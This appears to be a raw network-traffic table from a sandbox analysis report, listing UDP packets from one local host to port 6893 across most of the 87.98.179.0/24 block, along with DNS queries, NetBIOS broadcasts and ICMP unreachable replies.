                                                                                                                                                Sep 29, 2022 14:48:52.314758062 CEST655246893192.168.2.387.98.179.14
                                                                                                                                                Sep 29, 2022 14:48:52.314758062 CEST655246893192.168.2.387.98.179.16
                                                                                                                                                Sep 29, 2022 14:48:52.345699072 CEST655246893192.168.2.387.98.179.17
                                                                                                                                                Sep 29, 2022 14:48:52.345859051 CEST655246893192.168.2.387.98.179.18
                                                                                                                                                Sep 29, 2022 14:48:52.345984936 CEST655246893192.168.2.387.98.179.19
                                                                                                                                                Sep 29, 2022 14:48:52.346070051 CEST655246893192.168.2.387.98.179.20
                                                                                                                                                Sep 29, 2022 14:48:52.346155882 CEST655246893192.168.2.387.98.179.21
                                                                                                                                                Sep 29, 2022 14:48:52.346236944 CEST655246893192.168.2.387.98.179.22
                                                                                                                                                Sep 29, 2022 14:48:52.346348047 CEST655246893192.168.2.387.98.179.23
                                                                                                                                                Sep 29, 2022 14:48:52.346508980 CEST655246893192.168.2.387.98.179.24
                                                                                                                                                Sep 29, 2022 14:48:52.346651077 CEST655246893192.168.2.387.98.179.25
                                                                                                                                                Sep 29, 2022 14:48:52.346751928 CEST655246893192.168.2.387.98.179.26
                                                                                                                                                Sep 29, 2022 14:48:52.346852064 CEST655246893192.168.2.387.98.179.27
                                                                                                                                                Sep 29, 2022 14:48:52.346966982 CEST655246893192.168.2.387.98.179.28
                                                                                                                                                Sep 29, 2022 14:48:52.347078085 CEST655246893192.168.2.387.98.179.29
                                                                                                                                                Sep 29, 2022 14:48:52.347201109 CEST655246893192.168.2.387.98.179.30
                                                                                                                                                Sep 29, 2022 14:48:52.347479105 CEST655246893192.168.2.387.98.179.32
                                                                                                                                                Sep 29, 2022 14:48:52.347600937 CEST655246893192.168.2.387.98.179.31
                                                                                                                                                Sep 29, 2022 14:48:52.347600937 CEST655246893192.168.2.387.98.179.33
                                                                                                                                                Sep 29, 2022 14:48:52.347731113 CEST655246893192.168.2.387.98.179.34
                                                                                                                                                Sep 29, 2022 14:48:52.347812891 CEST655246893192.168.2.387.98.179.35
                                                                                                                                                Sep 29, 2022 14:48:52.347894907 CEST655246893192.168.2.387.98.179.36
                                                                                                                                                Sep 29, 2022 14:48:52.347974062 CEST655246893192.168.2.387.98.179.37
                                                                                                                                                Sep 29, 2022 14:48:52.348089933 CEST655246893192.168.2.387.98.179.38
                                                                                                                                                Sep 29, 2022 14:48:52.348162889 CEST655246893192.168.2.387.98.179.39
                                                                                                                                                Sep 29, 2022 14:48:52.348242998 CEST655246893192.168.2.387.98.179.40
                                                                                                                                                Sep 29, 2022 14:48:52.348352909 CEST655246893192.168.2.387.98.179.41
                                                                                                                                                Sep 29, 2022 14:48:52.348423004 CEST655246893192.168.2.387.98.179.42
                                                                                                                                                Sep 29, 2022 14:48:52.348515034 CEST655246893192.168.2.387.98.179.43
                                                                                                                                                Sep 29, 2022 14:48:52.348627090 CEST655246893192.168.2.387.98.179.44
                                                                                                                                                Sep 29, 2022 14:48:52.348711967 CEST655246893192.168.2.387.98.179.45
                                                                                                                                                Sep 29, 2022 14:48:52.348874092 CEST655246893192.168.2.387.98.179.46
                                                                                                                                                Sep 29, 2022 14:48:52.349030972 CEST655246893192.168.2.387.98.179.47
                                                                                                                                                Sep 29, 2022 14:48:52.349179983 CEST655246893192.168.2.387.98.179.48
                                                                                                                                                Sep 29, 2022 14:48:52.349467993 CEST655246893192.168.2.387.98.179.49
                                                                                                                                                Sep 29, 2022 14:48:52.349616051 CEST655246893192.168.2.387.98.179.50
                                                                                                                                                Sep 29, 2022 14:48:52.349720955 CEST655246893192.168.2.387.98.179.51
                                                                                                                                                Sep 29, 2022 14:48:52.349850893 CEST655246893192.168.2.387.98.179.52
                                                                                                                                                Sep 29, 2022 14:48:52.349962950 CEST655246893192.168.2.387.98.179.53
                                                                                                                                                Sep 29, 2022 14:48:52.350084066 CEST655246893192.168.2.387.98.179.54
                                                                                                                                                Sep 29, 2022 14:48:52.350305080 CEST655246893192.168.2.387.98.179.55
                                                                                                                                                Sep 29, 2022 14:48:52.350987911 CEST655246893192.168.2.387.98.179.57
                                                                                                                                                Sep 29, 2022 14:48:52.350990057 CEST655246893192.168.2.387.98.179.56
                                                                                                                                                Sep 29, 2022 14:48:52.370131969 CEST655246893192.168.2.387.98.179.58
                                                                                                                                                Sep 29, 2022 14:48:52.370260954 CEST655246893192.168.2.387.98.179.59
                                                                                                                                                Sep 29, 2022 14:48:52.371509075 CEST655246893192.168.2.387.98.179.60
                                                                                                                                                Sep 29, 2022 14:48:52.372051001 CEST655246893192.168.2.387.98.179.61
                                                                                                                                                Sep 29, 2022 14:48:52.372239113 CEST655246893192.168.2.387.98.179.62
                                                                                                                                                Sep 29, 2022 14:48:52.372507095 CEST655246893192.168.2.387.98.179.63
                                                                                                                                                Sep 29, 2022 14:48:52.372514009 CEST655246893192.168.2.387.98.179.64
                                                                                                                                                Sep 29, 2022 14:48:52.373698950 CEST655246893192.168.2.387.98.179.65
                                                                                                                                                Sep 29, 2022 14:48:52.374129057 CEST655246893192.168.2.387.98.179.66
                                                                                                                                                Sep 29, 2022 14:48:52.374284029 CEST655246893192.168.2.387.98.179.67
                                                                                                                                                Sep 29, 2022 14:48:52.374423981 CEST655246893192.168.2.387.98.179.68
                                                                                                                                                Sep 29, 2022 14:48:52.374547958 CEST655246893192.168.2.387.98.179.69
                                                                                                                                                Sep 29, 2022 14:48:52.375271082 CEST655246893192.168.2.387.98.179.70
                                                                                                                                                Sep 29, 2022 14:48:52.375446081 CEST655246893192.168.2.387.98.179.71
                                                                                                                                                Sep 29, 2022 14:48:52.375612020 CEST655246893192.168.2.387.98.179.72
                                                                                                                                                Sep 29, 2022 14:48:52.375757933 CEST655246893192.168.2.387.98.179.73
                                                                                                                                                Sep 29, 2022 14:48:52.375888109 CEST655246893192.168.2.387.98.179.74
                                                                                                                                                Sep 29, 2022 14:48:52.375994921 CEST655246893192.168.2.387.98.179.75
                                                                                                                                                Sep 29, 2022 14:48:52.376094103 CEST655246893192.168.2.387.98.179.76
                                                                                                                                                Sep 29, 2022 14:48:52.376198053 CEST655246893192.168.2.387.98.179.77
                                                                                                                                                Sep 29, 2022 14:48:52.376291037 CEST655246893192.168.2.387.98.179.78
                                                                                                                                                Sep 29, 2022 14:48:52.376427889 CEST655246893192.168.2.387.98.179.79
                                                                                                                                                Sep 29, 2022 14:48:52.376672029 CEST655246893192.168.2.387.98.179.80
                                                                                                                                                Sep 29, 2022 14:48:52.376775026 CEST655246893192.168.2.387.98.179.81
                                                                                                                                                Sep 29, 2022 14:48:52.376890898 CEST655246893192.168.2.387.98.179.82
                                                                                                                                                Sep 29, 2022 14:48:52.376986027 CEST655246893192.168.2.387.98.179.83
                                                                                                                                                Sep 29, 2022 14:48:52.377077103 CEST655246893192.168.2.387.98.179.84
                                                                                                                                                Sep 29, 2022 14:48:52.377183914 CEST655246893192.168.2.387.98.179.85
                                                                                                                                                Sep 29, 2022 14:48:52.377290964 CEST655246893192.168.2.387.98.179.86
                                                                                                                                                Sep 29, 2022 14:48:52.377368927 CEST655246893192.168.2.387.98.179.87
                                                                                                                                                Sep 29, 2022 14:48:52.377481937 CEST655246893192.168.2.387.98.179.88
                                                                                                                                                Sep 29, 2022 14:48:52.377558947 CEST655246893192.168.2.387.98.179.89
                                                                                                                                                Sep 29, 2022 14:48:52.377664089 CEST655246893192.168.2.387.98.179.90
                                                                                                                                                Sep 29, 2022 14:48:52.377768993 CEST655246893192.168.2.387.98.179.91
                                                                                                                                                Sep 29, 2022 14:48:52.377863884 CEST655246893192.168.2.387.98.179.92
                                                                                                                                                Sep 29, 2022 14:48:52.377980947 CEST655246893192.168.2.387.98.179.93
                                                                                                                                                Sep 29, 2022 14:48:52.378060102 CEST655246893192.168.2.387.98.179.94
                                                                                                                                                Sep 29, 2022 14:48:52.378161907 CEST655246893192.168.2.387.98.179.95
                                                                                                                                                Sep 29, 2022 14:48:52.378185987 CEST655246893192.168.2.387.98.179.96
                                                                                                                                                Sep 29, 2022 14:48:52.382340908 CEST655246893192.168.2.387.98.179.97
                                                                                                                                                Sep 29, 2022 14:48:52.382474899 CEST655246893192.168.2.387.98.179.98
                                                                                                                                                Sep 29, 2022 14:48:52.382546902 CEST655246893192.168.2.387.98.179.99
                                                                                                                                                Sep 29, 2022 14:48:52.382667065 CEST655246893192.168.2.387.98.179.100
                                                                                                                                                Sep 29, 2022 14:48:52.382785082 CEST655246893192.168.2.387.98.179.101
                                                                                                                                                Sep 29, 2022 14:48:52.382924080 CEST655246893192.168.2.387.98.179.102
                                                                                                                                                Sep 29, 2022 14:48:52.383025885 CEST655246893192.168.2.387.98.179.103
                                                                                                                                                Sep 29, 2022 14:48:52.383138895 CEST655246893192.168.2.387.98.179.104
                                                                                                                                                Sep 29, 2022 14:48:52.383234978 CEST655246893192.168.2.387.98.179.105
                                                                                                                                                Sep 29, 2022 14:48:52.383311987 CEST655246893192.168.2.387.98.179.106
                                                                                                                                                Sep 29, 2022 14:48:52.383398056 CEST655246893192.168.2.387.98.179.107
                                                                                                                                                Sep 29, 2022 14:48:52.383477926 CEST655246893192.168.2.387.98.179.108
                                                                                                                                                Sep 29, 2022 14:48:52.383554935 CEST655246893192.168.2.387.98.179.109
                                                                                                                                                Sep 29, 2022 14:48:52.383723974 CEST655246893192.168.2.387.98.179.111
                                                                                                                                                Sep 29, 2022 14:48:52.383800983 CEST655246893192.168.2.387.98.179.110
                                                                                                                                                Sep 29, 2022 14:48:52.383800983 CEST655246893192.168.2.387.98.179.112
                                                                                                                                                Sep 29, 2022 14:48:52.383894920 CEST655246893192.168.2.387.98.179.113
                                                                                                                                                Sep 29, 2022 14:48:52.383972883 CEST655246893192.168.2.387.98.179.114
                                                                                                                                                Sep 29, 2022 14:48:52.384145975 CEST655246893192.168.2.387.98.179.115
                                                                                                                                                Sep 29, 2022 14:48:52.384146929 CEST655246893192.168.2.387.98.179.116
                                                                                                                                                Sep 29, 2022 14:48:52.384221077 CEST655246893192.168.2.387.98.179.117
                                                                                                                                                Sep 29, 2022 14:48:52.384301901 CEST655246893192.168.2.387.98.179.118
                                                                                                                                                Sep 29, 2022 14:48:52.384382010 CEST655246893192.168.2.387.98.179.119
                                                                                                                                                Sep 29, 2022 14:48:52.384460926 CEST655246893192.168.2.387.98.179.120
                                                                                                                                                Sep 29, 2022 14:48:52.384533882 CEST655246893192.168.2.387.98.179.121
                                                                                                                                                Sep 29, 2022 14:48:52.384622097 CEST655246893192.168.2.387.98.179.122
                                                                                                                                                Sep 29, 2022 14:48:52.384702921 CEST655246893192.168.2.387.98.179.123
                                                                                                                                                Sep 29, 2022 14:48:52.384856939 CEST655246893192.168.2.387.98.179.124
                                                                                                                                                Sep 29, 2022 14:48:52.384982109 CEST655246893192.168.2.387.98.179.125
                                                                                                                                                Sep 29, 2022 14:48:52.385205030 CEST655246893192.168.2.387.98.179.126
                                                                                                                                                Sep 29, 2022 14:48:52.385358095 CEST655246893192.168.2.387.98.179.127
                                                                                                                                                Sep 29, 2022 14:48:52.385453939 CEST655246893192.168.2.387.98.179.128
                                                                                                                                                Sep 29, 2022 14:48:52.385569096 CEST655246893192.168.2.387.98.179.129
                                                                                                                                                Sep 29, 2022 14:48:52.385679960 CEST655246893192.168.2.387.98.179.130
                                                                                                                                                Sep 29, 2022 14:48:52.385768890 CEST655246893192.168.2.387.98.179.131
                                                                                                                                                Sep 29, 2022 14:48:52.385839939 CEST655246893192.168.2.387.98.179.132
                                                                                                                                                Sep 29, 2022 14:48:52.385936022 CEST655246893192.168.2.387.98.179.133
                                                                                                                                                Sep 29, 2022 14:48:52.386116028 CEST655246893192.168.2.387.98.179.134
                                                                                                                                                Sep 29, 2022 14:48:52.392097950 CEST655246893192.168.2.387.98.179.135
                                                                                                                                                Sep 29, 2022 14:48:52.392282963 CEST655246893192.168.2.387.98.179.136
                                                                                                                                                Sep 29, 2022 14:48:52.392537117 CEST655246893192.168.2.387.98.179.137
                                                                                                                                                Sep 29, 2022 14:48:52.392671108 CEST655246893192.168.2.387.98.179.138
                                                                                                                                                Sep 29, 2022 14:48:52.393161058 CEST655246893192.168.2.387.98.179.139
                                                                                                                                                Sep 29, 2022 14:48:52.393399000 CEST655246893192.168.2.387.98.179.141
                                                                                                                                                Sep 29, 2022 14:48:52.393498898 CEST655246893192.168.2.387.98.179.140
                                                                                                                                                Sep 29, 2022 14:48:52.393541098 CEST655246893192.168.2.387.98.179.142
                                                                                                                                                Sep 29, 2022 14:48:52.393654108 CEST655246893192.168.2.387.98.179.143
                                                                                                                                                Sep 29, 2022 14:48:52.393793106 CEST655246893192.168.2.387.98.179.144
                                                                                                                                                Sep 29, 2022 14:48:52.393894911 CEST655246893192.168.2.387.98.179.145
                                                                                                                                                Sep 29, 2022 14:48:52.394016027 CEST655246893192.168.2.387.98.179.146
                                                                                                                                                Sep 29, 2022 14:48:52.394143105 CEST655246893192.168.2.387.98.179.147
                                                                                                                                                Sep 29, 2022 14:48:52.394258976 CEST655246893192.168.2.387.98.179.148
                                                                                                                                                Sep 29, 2022 14:48:52.394360065 CEST655246893192.168.2.387.98.179.149
                                                                                                                                                Sep 29, 2022 14:48:52.394448996 CEST655246893192.168.2.387.98.179.150
                                                                                                                                                Sep 29, 2022 14:48:52.394584894 CEST655246893192.168.2.387.98.179.151
                                                                                                                                                Sep 29, 2022 14:48:52.394675970 CEST655246893192.168.2.387.98.179.152
                                                                                                                                                Sep 29, 2022 14:48:52.394803047 CEST655246893192.168.2.387.98.179.153
                                                                                                                                                Sep 29, 2022 14:48:52.394939899 CEST655246893192.168.2.387.98.179.154
                                                                                                                                                Sep 29, 2022 14:48:52.395023108 CEST655246893192.168.2.387.98.179.155
                                                                                                                                                Sep 29, 2022 14:48:52.395139933 CEST655246893192.168.2.387.98.179.156
                                                                                                                                                Sep 29, 2022 14:48:52.395239115 CEST655246893192.168.2.387.98.179.157
                                                                                                                                                Sep 29, 2022 14:48:52.395323038 CEST655246893192.168.2.387.98.179.158
                                                                                                                                                Sep 29, 2022 14:48:52.395456076 CEST655246893192.168.2.387.98.179.159
                                                                                                                                                Sep 29, 2022 14:48:52.395562887 CEST655246893192.168.2.387.98.179.160
                                                                                                                                                Sep 29, 2022 14:48:52.395657063 CEST655246893192.168.2.387.98.179.161
                                                                                                                                                Sep 29, 2022 14:48:52.395747900 CEST655246893192.168.2.387.98.179.162
                                                                                                                                                Sep 29, 2022 14:48:52.395940065 CEST655246893192.168.2.387.98.179.164
                                                                                                                                                Sep 29, 2022 14:48:52.396002054 CEST655246893192.168.2.387.98.179.163
                                                                                                                                                Sep 29, 2022 14:48:52.396024942 CEST655246893192.168.2.387.98.179.165
                                                                                                                                                Sep 29, 2022 14:48:52.396141052 CEST655246893192.168.2.387.98.179.166
                                                                                                                                                Sep 29, 2022 14:48:52.396294117 CEST655246893192.168.2.387.98.179.167
                                                                                                                                                Sep 29, 2022 14:48:52.396411896 CEST655246893192.168.2.387.98.179.168
                                                                                                                                                Sep 29, 2022 14:48:52.396534920 CEST655246893192.168.2.387.98.179.169
                                                                                                                                                Sep 29, 2022 14:48:52.396671057 CEST655246893192.168.2.387.98.179.170
                                                                                                                                                Sep 29, 2022 14:48:52.396785021 CEST655246893192.168.2.387.98.179.171
                                                                                                                                                Sep 29, 2022 14:48:52.396953106 CEST655246893192.168.2.387.98.179.173
                                                                                                                                                Sep 29, 2022 14:48:52.397047997 CEST655246893192.168.2.387.98.179.174
                                                                                                                                                Sep 29, 2022 14:48:52.397114992 CEST655246893192.168.2.387.98.179.175
                                                                                                                                                Sep 29, 2022 14:48:52.397165060 CEST655246893192.168.2.387.98.179.172
                                                                                                                                                Sep 29, 2022 14:48:52.397265911 CEST655246893192.168.2.387.98.179.176
                                                                                                                                                Sep 29, 2022 14:48:52.397376060 CEST655246893192.168.2.387.98.179.177
                                                                                                                                                Sep 29, 2022 14:48:52.397571087 CEST655246893192.168.2.387.98.179.179
                                                                                                                                                Sep 29, 2022 14:48:52.397638083 CEST655246893192.168.2.387.98.179.178
                                                                                                                                                Sep 29, 2022 14:48:52.397671938 CEST655246893192.168.2.387.98.179.180
                                                                                                                                                Sep 29, 2022 14:48:52.397773027 CEST655246893192.168.2.387.98.179.181
                                                                                                                                                Sep 29, 2022 14:48:52.397880077 CEST655246893192.168.2.387.98.179.182
                                                                                                                                                Sep 29, 2022 14:48:52.397952080 CEST655246893192.168.2.387.98.179.183
                                                                                                                                                Sep 29, 2022 14:48:52.398035049 CEST655246893192.168.2.387.98.179.184
                                                                                                                                                Sep 29, 2022 14:48:52.398163080 CEST655246893192.168.2.387.98.179.185
                                                                                                                                                Sep 29, 2022 14:48:52.398272038 CEST655246893192.168.2.387.98.179.186
                                                                                                                                                Sep 29, 2022 14:48:52.398365021 CEST655246893192.168.2.387.98.179.187
                                                                                                                                                Sep 29, 2022 14:48:52.398477077 CEST655246893192.168.2.387.98.179.188
                                                                                                                                                Sep 29, 2022 14:48:52.398642063 CEST655246893192.168.2.387.98.179.190
                                                                                                                                                Sep 29, 2022 14:48:52.398713112 CEST655246893192.168.2.387.98.179.189
                                                                                                                                                Sep 29, 2022 14:48:52.398740053 CEST655246893192.168.2.387.98.179.191
                                                                                                                                                Sep 29, 2022 14:48:52.398830891 CEST655246893192.168.2.387.98.179.192
                                                                                                                                                Sep 29, 2022 14:48:52.398910999 CEST655246893192.168.2.387.98.179.193
                                                                                                                                                Sep 29, 2022 14:48:52.398998976 CEST655246893192.168.2.387.98.179.194
                                                                                                                                                Sep 29, 2022 14:48:52.399094105 CEST655246893192.168.2.387.98.179.195
                                                                                                                                                Sep 29, 2022 14:48:52.399487019 CEST655246893192.168.2.387.98.179.197
                                                                                                                                                Sep 29, 2022 14:48:52.399698973 CEST655246893192.168.2.387.98.179.198
                                                                                                                                                Sep 29, 2022 14:48:52.399985075 CEST655246893192.168.2.387.98.179.199
                                                                                                                                                Sep 29, 2022 14:48:52.400012016 CEST655246893192.168.2.387.98.179.196
                                                                                                                                                Sep 29, 2022 14:48:52.400381088 CEST655246893192.168.2.387.98.179.200
                                                                                                                                                Sep 29, 2022 14:48:52.400583029 CEST655246893192.168.2.387.98.179.201
                                                                                                                                                Sep 29, 2022 14:48:52.400711060 CEST655246893192.168.2.387.98.179.202
                                                                                                                                                Sep 29, 2022 14:48:52.400839090 CEST655246893192.168.2.387.98.179.203
                                                                                                                                                Sep 29, 2022 14:48:52.401035070 CEST655246893192.168.2.387.98.179.204
                                                                                                                                                Sep 29, 2022 14:48:52.401226044 CEST655246893192.168.2.387.98.179.205
                                                                                                                                                Sep 29, 2022 14:48:52.401412010 CEST655246893192.168.2.387.98.179.206
                                                                                                                                                Sep 29, 2022 14:48:52.401534081 CEST655246893192.168.2.387.98.179.207
                                                                                                                                                Sep 29, 2022 14:48:52.401680946 CEST655246893192.168.2.387.98.179.208
                                                                                                                                                Sep 29, 2022 14:48:52.403386116 CEST655246893192.168.2.387.98.179.209
                                                                                                                                                Sep 29, 2022 14:48:52.403522968 CEST655246893192.168.2.387.98.179.210
                                                                                                                                                Sep 29, 2022 14:48:52.403616905 CEST655246893192.168.2.387.98.179.211
                                                                                                                                                Sep 29, 2022 14:48:52.403716087 CEST655246893192.168.2.387.98.179.212
                                                                                                                                                Sep 29, 2022 14:48:52.403825998 CEST655246893192.168.2.387.98.179.213
                                                                                                                                                Sep 29, 2022 14:48:52.403912067 CEST655246893192.168.2.387.98.179.214
                                                                                                                                                Sep 29, 2022 14:48:52.404006004 CEST655246893192.168.2.387.98.179.215
                                                                                                                                                Sep 29, 2022 14:48:52.404169083 CEST655246893192.168.2.387.98.179.216
                                                                                                                                                Sep 29, 2022 14:48:52.404339075 CEST655246893192.168.2.387.98.179.217
                                                                                                                                                Sep 29, 2022 14:48:52.404439926 CEST655246893192.168.2.387.98.179.218
                                                                                                                                                Sep 29, 2022 14:48:52.404526949 CEST655246893192.168.2.387.98.179.219
                                                                                                                                                Sep 29, 2022 14:48:52.404624939 CEST655246893192.168.2.387.98.179.220
                                                                                                                                                Sep 29, 2022 14:48:52.404793024 CEST655246893192.168.2.387.98.179.222
                                                                                                                                                Sep 29, 2022 14:48:52.404901028 CEST655246893192.168.2.387.98.179.223
                                                                                                                                                Sep 29, 2022 14:48:52.404905081 CEST655246893192.168.2.387.98.179.221
                                                                                                                                                Sep 29, 2022 14:48:52.405077934 CEST655246893192.168.2.387.98.179.224
                                                                                                                                                Sep 29, 2022 14:48:52.405201912 CEST655246893192.168.2.387.98.179.225
                                                                                                                                                Sep 29, 2022 14:48:52.405286074 CEST655246893192.168.2.387.98.179.226
                                                                                                                                                Sep 29, 2022 14:48:52.405469894 CEST655246893192.168.2.387.98.179.228
                                                                                                                                                Sep 29, 2022 14:48:52.405478001 CEST655246893192.168.2.387.98.179.227
                                                                                                                                                Sep 29, 2022 14:48:52.405567884 CEST655246893192.168.2.387.98.179.229
                                                                                                                                                Sep 29, 2022 14:48:52.405741930 CEST655246893192.168.2.387.98.179.230
                                                                                                                                                Sep 29, 2022 14:48:52.405829906 CEST655246893192.168.2.387.98.179.231
                                                                                                                                                Sep 29, 2022 14:48:52.405916929 CEST655246893192.168.2.387.98.179.232
                                                                                                                                                Sep 29, 2022 14:48:52.406006098 CEST655246893192.168.2.387.98.179.233
                                                                                                                                                Sep 29, 2022 14:48:52.406097889 CEST655246893192.168.2.387.98.179.234
                                                                                                                                                Sep 29, 2022 14:48:52.406188011 CEST655246893192.168.2.387.98.179.235
                                                                                                                                                Sep 29, 2022 14:48:52.406284094 CEST655246893192.168.2.387.98.179.236
                                                                                                                                                Sep 29, 2022 14:48:52.406364918 CEST655246893192.168.2.387.98.179.237
                                                                                                                                                Sep 29, 2022 14:48:52.406457901 CEST655246893192.168.2.387.98.179.238
                                                                                                                                                Sep 29, 2022 14:48:52.406539917 CEST655246893192.168.2.387.98.179.239
                                                                                                                                                Sep 29, 2022 14:48:52.406637907 CEST655246893192.168.2.387.98.179.240
                                                                                                                                                Sep 29, 2022 14:48:52.406717062 CEST655246893192.168.2.387.98.179.241
                                                                                                                                                Sep 29, 2022 14:48:52.406913042 CEST655246893192.168.2.387.98.179.242
                                                                                                                                                Sep 29, 2022 14:48:52.406924009 CEST655246893192.168.2.387.98.179.243
                                                                                                                                                Sep 29, 2022 14:48:52.406997919 CEST655246893192.168.2.387.98.179.244
                                                                                                                                                Sep 29, 2022 14:48:52.407162905 CEST655246893192.168.2.387.98.179.245
                                                                                                                                                Sep 29, 2022 14:48:52.408107042 CEST655246893192.168.2.387.98.179.246
                                                                                                                                                Sep 29, 2022 14:48:52.408201933 CEST655246893192.168.2.387.98.179.247
                                                                                                                                                Sep 29, 2022 14:48:52.408298969 CEST655246893192.168.2.387.98.179.248
                                                                                                                                                Sep 29, 2022 14:48:52.408385038 CEST655246893192.168.2.387.98.179.249
                                                                                                                                                Sep 29, 2022 14:48:52.408488035 CEST655246893192.168.2.387.98.179.250
                                                                                                                                                Sep 29, 2022 14:48:52.408675909 CEST655246893192.168.2.387.98.179.251
                                                                                                                                                Sep 29, 2022 14:48:52.408797979 CEST655246893192.168.2.387.98.179.252
                                                                                                                                                Sep 29, 2022 14:48:52.408902884 CEST655246893192.168.2.387.98.179.253
                                                                                                                                                Sep 29, 2022 14:48:52.408988953 CEST655246893192.168.2.387.98.179.254
                                                                                                                                                Sep 29, 2022 14:48:53.424330950 CEST655246893192.168.2.387.98.179.255
                                                                                                                                                Sep 29, 2022 14:49:17.034960032 CEST138138192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:17.035157919 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:17.286513090 CEST5986953192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:17.304323912 CEST53598698.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:17.779047012 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:18.544723988 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:19.480129004 CEST5439753192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:19.507842064 CEST53543978.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:19.652098894 CEST5932453192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:19.669548988 CEST53593248.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:20.344171047 CEST138138192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:20.344351053 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:21.091845036 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:21.857501030 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:23.713179111 CEST138138192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:23.713691950 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:24.467065096 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:24.550293922 CEST5901453192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:24.755902052 CEST53590148.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:25.232800007 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:27.049954891 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:27.811162949 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:28.576792955 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:49:35.699618101 CEST6162653192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:35.716871023 CEST53616268.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:38.762623072 CEST6178753192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:38.781932116 CEST53617878.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:41.312468052 CEST5892153192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:41.331820011 CEST53589218.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:44.405601025 CEST4997753192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:44.423228979 CEST53499778.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:46.710273981 CEST5784053192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:46.730151892 CEST53578408.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:47.002482891 CEST5799053192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:47.020317078 CEST53579908.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:49.975743055 CEST5238753192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:49.994954109 CEST53523878.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:56.839838982 CEST6062553192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:49:56.861150026 CEST53606258.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:00.112668037 CEST5295553192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:50:00.129933119 CEST53529558.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:03.463121891 CEST6058253192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:50:03.482307911 CEST53605828.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:08.226022005 CEST53571348.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:08.250828981 CEST53620508.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:08.576381922 CEST5604253192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:50:08.596714973 CEST53560428.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:10.588630915 CEST5963653192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:50:10.608457088 CEST53596368.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:13.719899893 CEST5770453192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:50:13.737261057 CEST53577048.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:15.246871948 CEST6532053192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:50:15.269243002 CEST53653208.8.8.8192.168.2.3
                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                Sep 29, 2022 14:48:40.542107105 CEST87.98.176.34192.168.2.3c758(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.542182922 CEST87.98.176.39192.168.2.3c764(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.543586016 CEST87.98.176.1192.168.2.3c73e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.544121027 CEST87.98.176.9192.168.2.3c746(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.544450045 CEST87.98.176.14192.168.2.3c744(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.544473886 CEST87.98.176.7192.168.2.3c744(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.544620991 CEST87.98.176.8192.168.2.3c745(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:40.544858932 CEST87.98.176.11192.168.2.3c748(Port unreachable)Destination Unreachable
